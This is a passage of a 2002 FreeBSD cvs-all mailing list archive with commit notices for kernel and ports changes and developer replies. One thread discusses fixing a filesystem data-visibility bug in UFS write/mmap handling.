with ESMTP id 85F0D37B406; Wed, 19 Jun 2002 19:04:55 -0700 (PDT) Received: (from alc@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K24tY52596; Wed, 19 Jun 2002 19:04:55 -0700 (PDT) (envelope-from alc) Message-Id: <200206200204.g5K24tY52596@freefall.freebsd.org> From: Alan Cox Date: Wed, 19 Jun 2002 19:04:55 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/vm vm_unix.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alc 2002/06/19 19:04:55 PDT Modified files: sys/vm vm_unix.c Log: o Acquire and release the vm_map lock instead of Giant in obreak(). Consequently, use vm_map_insert() and vm_map_delete(), which expect the vm_map to be locked, instead of vm_map_find() and vm_map_remove(), which do not. Revision Changes Path 1.38 +7 -11 src/sys/vm/vm_unix.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 19: 9: 0 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D67CC37B404; Wed, 19 Jun 2002 19:08:57 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K28vD57060; Wed, 19 Jun 2002 19:08:57 -0700 (PDT) (envelope-from pat) Message-Id: <200206200208.g5K28vD57060@freefall.freebsd.org> From: Patrick Li Date: Wed, 19 Jun 2002 19:08:57 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/graphics/netpbm Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/19 19:08:57 PDT Modified files: graphics/netpbm Makefile Log: Add forgotten USE_REINPLACE. PR: 39552 Submitted by: Edwin Groothuis Revision Changes Path 1.59 +1 -0 ports/graphics/netpbm/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 19:18:17 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4DD0A37B400; Wed, 19 Jun 2002 19:18:13 -0700 (PDT) Received: (from alane@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K2IDZ58071; Wed, 19 Jun 2002 19:18:13 -0700 (PDT) (envelope-from alane) Message-Id: <200206200218.g5K2IDZ58071@freefall.freebsd.org> From: Alan Eldridge Date: Wed, 19 Jun 2002 19:18:13 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/samba Makefile pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alane 2002/06/19 19:18:13 PDT Modified files: net/samba Makefile pkg-plist Log: Fix pkg-plist after version bump. Bump PORTREVISION to 1. Remove a stray object file if it exists, prior to installing examples. This patch is not guaranteed to be perfect for all permutations of WITH_* options. However, it works for the default case. Submitted by: alane@freebsd.org Approved by: dwcjr@freebsd.org Revision Changes Path 1.91 +4 -1 ports/net/samba/Makefile 1.37 +0 -7 ports/net/samba/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 19:20:53 2002 Delivered-To: cvs-all@freebsd.org Received: from leviathan.inethouston.net (leviathan.inethouston.net [66.64.12.249]) by hub.freebsd.org (Postfix) with ESMTP id CB04D37B405; Wed, 19 Jun 2002 19:20:42 -0700 (PDT) Received: by leviathan.inethouston.net (Postfix, from userid 1001) id 48A363198DE; Wed, 19 Jun 2002 21:20:48 -0500 (CDT) Date: Wed, 19 Jun 2002 21:20:48 -0500 From: "David W. Chapman Jr." To: Alan Eldridge Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: ports/net/samba Makefile pkg-plist Message-ID: <20020620022048.GC89502@leviathan.inethouston.net> Reply-To: "David W. Chapman Jr." Mail-Followup-To: Alan Eldridge , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org References: <200206200218.g5K2IDZ58071@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206200218.g5K2IDZ58071@freefall.freebsd.org> X-Operating-System: FreeBSD 4.5-STABLE i386 User-Agent: Mutt/1.5.1i Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wed, Jun 19, 2002 at 07:18:13PM -0700, Alan Eldridge wrote: > alane 2002/06/19 19:18:13 PDT > > Modified files: > net/samba Makefile pkg-plist > Log: > Fix pkg-plist after version bump. > Bump PORTREVISION to 1. > Remove a stray object file if it exists, prior to installing examples. > This patch is not guaranteed to be perfect for all permutations of WITH_* > options. However, it works for the default case. > Thanks!!!!! -- David W. Chapman Jr. dwcjr@inethouston.net Raintree Network Services, Inc. dwcjr@freebsd.org FreeBSD Committer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 19:28:51 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5AABF37B401; Wed, 19 Jun 2002 19:28:48 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K2SmH59253; Wed, 19 Jun 2002 19:28:48 -0700 (PDT) (envelope-from pat) Message-Id: <200206200228.g5K2SmH59253@freefall.freebsd.org> From: Patrick Li Date: Wed, 19 Jun 2002 19:28:48 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/misc/less Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/19 19:28:48 PDT Modified files: misc/less Makefile distinfo Log: Update to 376 PR: 39546 Submitted by: maintainer Revision Changes Path 1.35 +1 -1 ports/misc/less/Makefile 1.15 +1 -1 ports/misc/less/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 19:46:36 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D0F2D37B40C; Wed, 19 Jun 2002 19:46:29 -0700 (PDT) Received: (from glewis@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K2kT461271; Wed, 19 Jun 2002 19:46:29 -0700 (PDT) (envelope-from glewis) Message-Id: <200206200246.g5K2kT461271@freefall.freebsd.org> From: Greg Lewis Date: Wed, 19 Jun 2002 19:46:29 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/science/vis5d+ Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG glewis 2002/06/19 19:46:29 PDT Modified files: science/vis5d+ Makefile Log: Add missing dependency on gtkgl and unbreak the port. PR: 39551 Submitted by: Stephen Montgomery-Smith Revision Changes Path 1.6 +2 -1 ports/science/vis5d+/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 20: 8:24 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 370E837B40D; Wed, 19 Jun 2002 20:08:21 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K38L167728; Wed, 19 Jun 2002 20:08:21 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206200308.g5K38L167728@freefall.freebsd.org> From: Juli Mallett Date: Wed, 19 Jun 2002 20:08:20 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/tools/regression/usr.bin/make Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/19 20:08:20 PDT Modified files: tools/regression/usr.bin/make Makefile Log: Grrr, make the test for embedded variables in the left-hand-side actually do the right thing in every case. Yuck. Revision Changes Path 1.6 +2 -2 src/tools/regression/usr.bin/make/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 21: 3:16 2002 Delivered-To: cvs-all@freebsd.org Received: from mailman.zeta.org.au (mailman.zeta.org.au [203.26.10.16]) by hub.freebsd.org (Postfix) with ESMTP id A7E5137B400; Wed, 19 Jun 2002 21:03:09 -0700 (PDT) Received: from bde.zeta.org.au (bde.zeta.org.au [203.2.228.102]) by mailman.zeta.org.au (8.9.3/8.8.7) with ESMTP id OAA27366; Thu, 20 Jun 2002 14:03:05 +1000 Date: Thu, 20 Jun 2002 14:07:57 +1000 (EST) From: Bruce Evans X-X-Sender: bde@gamplex.bde.org To: Matt Dillon Cc: cvs-committers@FreeBSD.org, Subject: Re: cvs commit: src/sys/ufs/ufs ufs_readwrite.c In-Reply-To: <200206190939.g5J9dfc51512@freefall.freebsd.org> Message-ID: <20020620135555.R11071-100000@gamplex.bde.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wed, 19 Jun 2002, Matt Dillon wrote: > dillon 2002/06/19 02:39:41 PDT > > Modified files: > sys/ufs/ufs ufs_readwrite.c > Log: > In rev 1.72 a situation related to write/mmap was fixed which could result > in a user process gaining visibility into the 'old' contents of a filesystem > block. There were two cases: (1) when uiomove() fails (user process issues > illegal write), and (2) when uiomove() overlaps a mmap() of the same file at > the same offset (fault -> recursive buffer I/O reads contents of old block). I fixed (1) in FreeBSD-1 by always backing out the write in the EFAULT case: %%% Index: ufs_vnops.c =================================================================== RCS file: /home/ncvs/src1/sys/ufs/ufs_vnops.c,v retrieving revision 1.2 retrieving revision 1.3 diff -u -2 -r1.2 -r1.3 --- ufs_vnops.c 22 Jul 1993 16:58:16 -0000 1.2 +++ ufs_vnops.c 27 Jul 1993 10:53:29 -0000 1.3 @@ -607,5 +607,5 @@ ip->i_mode &= ~(ISUID|ISGID); } while (error == 0 && uio->uio_resid > 0 && n != 0); - if (error && (ioflag & IO_UNIT)) { + if (error == EFAULT || error && (ioflag & IO_UNIT)) { (void) itrunc(ip, osize, ioflag & IO_SYNC); uio->uio_offset -= resid - uio->uio_resid; %%% but this is barely needed in FreeBSD-2 because IO_UNIT is set for regular in vn_write(). (IO_UNIT is a rather bogus flag. I haven't found any cases where not setting it is correct. It's main function was apparently to give atomic writes, but that function has been broken by splitting up the writes external (e.g., to break atomic writing of ktrace records), leaving only its secondary function of (completely) backing out of failed write(2)'s to regular files so that broken writers aren't confused by short writes.) At least some of these these bugs are still present in at least some filesysterms that were cloned from ffs. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 21:18:54 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EF60F37B403; Wed, 19 Jun 2002 21:18:50 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K4Iok78505; Wed, 19 Jun 2002 21:18:50 -0700 (PDT) (envelope-from pat) Message-Id: <200206200418.g5K4Iok78505@freefall.freebsd.org> From: Patrick Li Date: Wed, 19 Jun 2002 21:18:50 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/sysutils/ipa Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/19 21:18:50 PDT Modified files: sysutils/ipa Makefile distinfo Log: Update to 1.2.6 PR: 39539 Submitted by: maintainer Revision Changes Path 1.20 +2 -2 ports/sysutils/ipa/Makefile 1.17 +1 -1 ports/sysutils/ipa/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 21:20:30 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A957737B412; Wed, 19 Jun 2002 21:20:26 -0700 (PDT) Received: (from keramida@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K4KQ678927; Wed, 19 Jun 2002 21:20:26 -0700 (PDT) (envelope-from keramida) Message-Id: <200206200420.g5K4KQ678927@freefall.freebsd.org> From: Giorgos Keramidas Date: Wed, 19 Jun 2002 21:20:26 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/en_US.ISO8859-1/share/sgml authors.ent X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG keramida 2002/06/19 21:20:26 PDT Modified files: en_US.ISO8859-1/share/sgml authors.ent Log: Fix build of articles/contributors/ by adding an entity for &a.scop; Revision Changes Path 1.233 +2 -0 doc/en_US.ISO8859-1/share/sgml/authors.ent To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 21:24:38 2002 Delivered-To: cvs-all@freebsd.org Received: from mailsrv.otenet.gr (mailsrv.otenet.gr [195.170.0.5]) by hub.freebsd.org (Postfix) with ESMTP id A7A1437B406; Wed, 19 Jun 2002 21:24:31 -0700 (PDT) Received: from hades.hell.gr (patr530-b162.otenet.gr [212.205.244.170]) by mailsrv.otenet.gr (8.12.3/8.12.3) with ESMTP id g5K4O5qK012170; Thu, 20 Jun 2002 07:24:22 +0300 (EEST) Received: from hades.hell.gr (hades [127.0.0.1]) by hades.hell.gr (8.12.4/8.12.4) with ESMTP id g5K4Nxdv062704; Thu, 20 Jun 2002 07:24:00 +0300 (EEST) (envelope-from keramida@FreeBSD.org) Received: (from charon@localhost) by hades.hell.gr (8.12.4/8.12.4/Submit) id g5K4Nnc0062703; Thu, 20 Jun 2002 07:23:49 +0300 (EEST) (envelope-from keramida@FreeBSD.org) Date: Thu, 20 Jun 2002 07:23:49 +0300 From: Giorgos Keramidas To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Cc: scop@FreeBSD.org Subject: Re: cvs commit: doc/en_US.ISO8859-1/share/sgml authors.ent Message-ID: <20020620042349.GA62574@hades.hell.gr> References: <200206200420.g5K4KQ678927@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="huq684BweRXVnRxX" Content-Disposition: inline In-Reply-To: <200206200420.g5K4KQ678927@freefall.freebsd.org> Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --huq684BweRXVnRxX Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On 2002-06-19 21:20 +0000, Giorgos Keramidas wrote: > keramida 2002/06/19 21:20:26 PDT > > Modified files: > en_US.ISO8859-1/share/sgml authors.ent > Log: > Fix build of articles/contributors/ by adding an entity for &a.scop; Ville, I didn't know what the proper letter for the last part of your name was. If ä is not the right thing, feel free to jump in and fix this by using the right entity. Oh, and... Welcome aboard. Let's conquer the world :) - Giorgos --huq684BweRXVnRxX Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9EVjU1g+UGjGGA7YRAu2zAJ9EyJWwc5tdAIUkXvSmNh/6MBtdHQCgmhtV ceYl7i7u1ilzGiLxtLpXizw= =B1Am -----END PGP SIGNATURE----- --huq684BweRXVnRxX-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 21:33:12 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9A7F037B40C; Wed, 19 Jun 2002 21:33:06 -0700 (PDT) Received: (from gshapiro@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K4X6N80308; Wed, 19 Jun 2002 21:33:06 -0700 (PDT) (envelope-from gshapiro) Message-Id: <200206200433.g5K4X6N80308@freefall.freebsd.org> From: Gregory Neil Shapiro Date: Wed, 19 Jun 2002 21:33:06 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/share/examples/etc make.conf src/share/man/man5 make.conf.5 X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG gshapiro 2002/06/19 21:33:06 PDT Modified files: share/examples/etc make.conf share/man/man5 make.conf.5 Log: Add a warning regarding the SENDMAIL_*_MC make.conf variable values. Using /etc/mail/sendmail.mc will create /etc/mail/sendmail.cf during a buildworld. PR: misc/39397 MFC after: 3 days Revision Changes Path 1.192 +9 -0 src/share/examples/etc/make.conf 1.52 +21 -0 src/share/man/man5/make.conf.5 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 21:35:41 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 318F537B409; Wed, 19 Jun 2002 21:35:37 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K4ZbH80584; Wed, 19 Jun 2002 21:35:37 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206200435.g5K4ZbH80584@freefall.freebsd.org> From: Ying-Chieh Liao Date: Wed, 19 Jun 2002 21:35:37 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/apache13-fp Makefile pkg-deinstall pkg-install pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/19 21:35:37 PDT Modified files: www/apache13-fp Makefile pkg-install pkg-plist Added files: www/apache13-fp pkg-deinstall Log: handle unremoved files more properly bump portrevision PR: 39557 Submitted by: maintainer Revision Changes Path 1.34 +1 -1 ports/www/apache13-fp/Makefile 1.1 +107 -0 ports/www/apache13-fp/pkg-deinstall (new) 1.7 +4 -4 ports/www/apache13-fp/pkg-install 1.22 +4 -0 ports/www/apache13-fp/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 21:37:13 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6779937B404; Wed, 19 Jun 2002 21:37:08 -0700 (PDT) Received: (from mi@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K4b8N80826; Wed, 19 Jun 2002 21:37:08 -0700 (PDT) (envelope-from mi) Message-Id: <200206200437.g5K4b8N80826@freefall.freebsd.org> From: Mikhail Teterin Date: Wed, 19 Jun 2002 21:37:08 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/graphics/ImageMagick Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mi 2002/06/19 21:37:08 PDT Modified files: graphics/ImageMagick Makefile distinfo pkg-plist Log: Upgrade to 5.4.6.1 Revision Changes Path 1.142 +1 -1 ports/graphics/ImageMagick/Makefile 1.69 +1 -1 ports/graphics/ImageMagick/distinfo 1.63 +0 -1 ports/graphics/ImageMagick/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 21:38: 2 2002 Delivered-To: cvs-all@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [216.240.41.2]) by hub.freebsd.org (Postfix) with ESMTP id 8C9A437B407; Wed, 19 Jun 2002 21:37:56 -0700 (PDT) Received: from apollo.backplane.com (localhost [127.0.0.1]) by apollo.backplane.com (8.12.3/8.12.3) with ESMTP id g5K4buCV036455; Wed, 19 Jun 2002 21:37:56 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.12.3/8.12.3/Submit) id g5K4buMu036454; Wed, 19 Jun 2002 21:37:56 -0700 (PDT) (envelope-from dillon) Date: Wed, 19 Jun 2002 21:37:56 -0700 (PDT) From: Matthew Dillon Message-Id: <200206200437.g5K4buMu036454@apollo.backplane.com> To: Bruce Evans Cc: cvs-committers@FreeBSD.ORG, Subject: Re: cvs commit: src/sys/ufs/ufs ufs_readwrite.c Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG :> Log: :> In rev 1.72 a situation related to write/mmap was fixed which could result :> in a user process gaining visibility into the 'old' contents of a filesystem :> block. There were two cases: (1) when uiomove() fails (user process issues :> illegal write), and (2) when uiomove() overlaps a mmap() of the same file at :> the same offset (fault -> recursive buffer I/O reads contents of old block). : :I fixed (1) in FreeBSD-1 by always backing out the write in the EFAULT case: Yah, #1 is fairly easy to deal with. #2 is a real mess. Even with the fix I originally had in there (and just moved around a little in this commit), Tor was able to write a little two line program to demonstrate that there are still issues with fragment extension. My little fix doesn't actually change the outstanding issues at all, it just hacks around the read-before-write that the original fix introduced. It's necessary because the read-before-write kills rewrite performance by 75% (e.g. 20 MBytes/sec -> 5 MBytes/sec), and on hardware RAID systems it can be 80 - 90% write performance *LOSS*, depending on the configuration. We still have serious issues with fragment extension (which wasn't covered by the original fix or this commit)... Tor has a two-line program which demonstrates data visibility during fragment extension. Kirk, Tor and I (mainly Tor and I) are exploring options for a real fix. Constructive comments are welcome but this particular area of the codebase is extremely complex and I doubt more then a handful of people even understand how it works. The case in question here is write()ing an overlapped mmap()'d buffer to the same descriptor. The code path is: write() -> ufs_readwrite() -> uiomove() -> (fault) -> ffs_getpages() ... I/O, (fault return) resume-uiomove() -> bdwrite(). Approximately. Very, very nasty. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 21:41:14 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2EB9F37B40B; Wed, 19 Jun 2002 21:41:08 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K4f8j81265; Wed, 19 Jun 2002 21:41:08 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206200441.g5K4f8j81265@freefall.freebsd.org> From: Ying-Chieh Liao Date: Wed, 19 Jun 2002 21:41:07 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/emulators Makefile ports/emulators/cinc Makefile distinfo pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/19 21:41:07 PDT Modified files: emulators Makefile Added files: emulators/cinc Makefile distinfo pkg-comment pkg-descr pkg-plist Log: add cinc 2.1.3 Bell Laboratories cardiac computer emulator PR: 39155 Submitted by: Amar Takhar Revision Changes Path 1.90 +1 -0 ports/emulators/Makefile 1.1 +19 -0 ports/emulators/cinc/Makefile (new) 1.1 +1 -0 ports/emulators/cinc/distinfo (new) 1.1 +1 -0 ports/emulators/cinc/pkg-comment (new) 1.1 +12 -0 ports/emulators/cinc/pkg-descr (new) 1.1 +2 -0 ports/emulators/cinc/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 21:41:17 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 167A637B40D; Wed, 19 Jun 2002 21:41:12 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K4fCN81296; Wed, 19 Jun 2002 21:41:12 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206200441.g5K4fCN81296@freefall.freebsd.org> From: Ying-Chieh Liao Date: Wed, 19 Jun 2002 21:41:12 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/19 21:41:11 PDT Modified files: . modules Log: cinc --> ports/emulators/cinc Revision Changes Path 1.5391 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 21:47:52 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3C7FC37B40F; Wed, 19 Jun 2002 21:47:48 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K4lmt82284; Wed, 19 Jun 2002 21:47:48 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206200447.g5K4lmt82284@freefall.freebsd.org> From: Ying-Chieh Liao Date: Wed, 19 Jun 2002 21:47:47 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/graphics Makefile ports/graphics/jpegpixi Makefile distinfo pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/19 21:47:47 PDT Modified files: graphics Makefile Added files: graphics/jpegpixi Makefile distinfo pkg-comment pkg-descr pkg-plist Log: add jpegpixi 0.3 Useful to correct images from digtal camera with CCD defects PR: 39157 Submitted by: Amar Takhar Revision Changes Path 1.460 +1 -0 ports/graphics/Makefile 1.1 +22 -0 ports/graphics/jpegpixi/Makefile (new) 1.1 +1 -0 ports/graphics/jpegpixi/distinfo (new) 1.1 +1 -0 ports/graphics/jpegpixi/pkg-comment (new) 1.1 +17 -0 ports/graphics/jpegpixi/pkg-descr (new) 1.1 +1 -0 ports/graphics/jpegpixi/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 21:47:54 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 20F3137B400; Wed, 19 Jun 2002 21:47:51 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K4lpN82315; Wed, 19 Jun 2002 21:47:51 -0700 (PDT) (envelope-from ijliao) Message-Id: 